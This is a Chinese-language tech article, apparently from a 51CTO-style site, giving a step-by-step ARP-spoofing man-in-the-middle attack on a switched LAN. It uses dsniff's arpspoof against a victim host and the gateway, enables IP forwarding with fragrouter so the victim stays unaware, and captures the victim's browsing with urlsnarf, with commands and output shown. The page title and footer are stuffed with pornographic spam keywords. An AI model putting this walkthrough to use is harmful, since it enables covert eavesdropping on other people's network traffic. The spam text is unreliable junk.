成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

對交換環境下Sniffer的闡述

企業動態
我們今天主要向大家講述的是交換環境下的Sniffer,以及對在交換環境中使用NetXray或者NAISniffer一類的嗅探工具除去抓到自己的包以外的相關內容講述。

此文章主要向大家描述的是交換環境下的Sniffer,通常在局域網環境中,我們都是通過交換環境的網關上網的,在交換環境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網絡通信的。

通常在局域網環境中,我們都是通過交換環境的網關上網的,在交換環境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網絡通信的。

 

但是我們可以通過利用ARP欺騙可以實現Sniffer的目的。

ARP協議是將IP解析為MAC地址的協議,局域網中的通信都是基于MAC的。

例如下面這樣的情況:

在局域網中192.168.0.24和192.168.0.29都是通過網關192.168.0.1上網的,假定攻擊者的系統為192.168.0.24,他希望聽到192.168.0.29的通信,那么我們就可以利用ARP欺騙實現。

1、首先告訴192.168.0.29,網關192.168.0.1的MAC地址是192.168.0.24

2、告訴192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。

這樣192.168.0.29和192.168.0.1之間的數據包,就會發給192.168.0.24,也就是攻擊者的機器,這樣就可以聽到會話了。但是這么做的有一個問題,192.168.0.29發現自己不能上網了,因為原來發給192.168.0.1的數據包都被192.168.0.24接收了,而并沒有發給網關192.168.0.1。

這時候192.168.0.24設置一個包轉發的東西就可以解決這個問題了,也就是從192.168.0.29收到的包轉發給192.168.0.1,在把從192.168.0.1收到的包發給192.168.0.29。這樣192.168.0.29根本就不會意識到自己被監聽了。

具體實現:

1、欺騙192.168.0.29,告訴這臺機器網關192.168.0.1的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.29192.168.0.1

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18

………………………………..

這時候對192.168.0.29的ARP欺騙就開始了。

2、欺騙192.168.0.1,告訴網關192.168.0.29的MAC地址是自己(192.168.0.24)。

[root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.1192.168.0.29

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

其實在這個時候192.168.0.29是可以發現的自己被欺騙了。在CMD下面使用ARP–a命令:

C:\WINNT>arp-a

Interface:192.168.0.29onInterface0x1000003

InternetAddressPhysicalAddressType

192.168.0.100-50-56-40-07-71dynamic

192.168.0.2400-50-56-40-07-71dynamic

兩個IP地址的MAC地址居然是一模一樣的!不過很少有人會這么做:-)。

3、設置一個包轉發

[root@Linuxfragrouter-1.6]#./fragrouter-B1

fragrouter:base-1:normalIPforwarding

在這之前別忘了首先需要打開包轉發的功能

[root@Linux/proc]#echo1>/proc/sys/net/ipv4/ip_forward

萬事具備,可以開始SNIFFER了。

例如想看看192.168.0.29在瀏覽什么地方:

[root@Linuxdsniff-2.3]#./urlsnarf

urlsnarf:listeningoneth0[tcpport80orport8080orport3128]

Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.cssHTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/spch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

當然也可以知道其他………:-)

以上的相關內容就是對交換環境下的Sniffer 的介紹,望你能有所收獲。

【編輯推薦】

  1. 網絡嗅探教程:使用Sniffer Pro監控ARP協議欺騙
  2. 教你使用Anti ARP Sniffer查找ARP攻擊者
  3. 網絡嗅探教程:使用Sniffer Pro監控網絡流量
  4. 用Sniffer和ARP分析網絡問題
  5. 使用Sniffer截獲流經本機網卡的IP數據包
責任編輯:佚名 來源: 中國IT實驗室
相關推薦

2010-10-09 10:05:05

2010-10-09 09:05:58

2009-12-01 18:41:08

SUSE Linux

2010-07-19 14:17:47

SQL Server內

2010-03-22 17:44:18

核心交換機

2010-10-09 17:02:13

2010-04-02 10:12:07

無線交換機管理優勢

2010-08-06 13:20:00

DB2鎖等待

2010-03-16 15:24:15

四層交換機

2010-03-18 17:01:52

Cisco交換機

2010-01-12 18:00:30

Visual C++

2010-08-02 11:38:43

DB2外部文件格式

2010-10-09 14:38:40

2021-06-29 12:10:48

CentOSMySQL工具

2009-12-01 11:01:39

交叉編譯環境構建

2009-06-24 08:46:16

2010-03-11 09:40:11

管理型交換機

2010-01-11 09:28:34

C++編程

2010-03-18 16:47:31

以太網交換機

2009-09-08 09:30:00

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲免费精品 | 毛片一区二区三区 | 亚洲高清免费视频 | 丝袜美腿一区二区三区动态图 | 人人做人人澡人人爽欧美 | 欧美性网 | 国产精品日产欧美久久久久 | 国产精品色婷婷久久58 | 久久久久99 | 在线看一区二区三区 | 午夜影视大全 | 国产1区 | 亚洲国产片 | 91精品国产综合久久精品图片 | 国产精品久久久久久久久久久久 | 国产探花在线精品一区二区 | 国产成人精品午夜视频免费 | 免费国产视频 | 日韩在线中文字幕 | 日日干天天操 | 亚洲欧美在线一区 | 成人自拍视频 | 色永久 | 波多野结衣一区二区 | 久久亚洲国产精品 | 欧美精品一区在线 | 99久久国产精| 成人网址在线观看 | 日本黄色的视频 | 亚洲一二三区免费 | 免费人成激情视频在线观看冫 | 亚洲精品在线视频 | 精品国产欧美一区二区三区成人 | 日韩一区二区精品 | 亚洲视频在线看 | 久精品久久 | 国产精品一区二区视频 | 黄色国产区| 国产日韩一区二区三区 | 久久亚洲天堂 | 久久久久久国产精品免费免费男同 |